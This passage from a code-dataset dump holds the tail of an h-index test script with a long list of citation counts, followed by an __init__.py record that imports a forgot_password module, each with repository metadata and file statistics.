1,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100]
cits = [0]
cits = [1,2]
cits = [0,1,1,2]
print Solution().hIndex(cits)
| 1,022.586207
| 29,130
| 0.654527
| 10,094
| 29,655
| 1.922925
| 0.012582
| 0.025554
| 0.038022
| 0.050283
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0
| 0.648562
| 0.004788
| 29,655
| 28
| 29,131
| 1,059.107143
| 0.009115
| 0.001888
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.052632
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
7421084799af7776dd51f8d48d87f131b42144ae
| 31
|
py
|
Python
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 1
|
2017-02-09T10:17:50.000Z
|
2017-02-09T10:17:50.000Z
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 54
|
2016-09-07T11:01:32.000Z
|
2020-02-12T06:15:43.000Z
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 14
|
2016-09-20T05:36:49.000Z
|
2019-04-02T15:42:37.000Z
|
from .forgot_password import *
| 15.5
| 30
| 0.806452
| 4
| 31
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
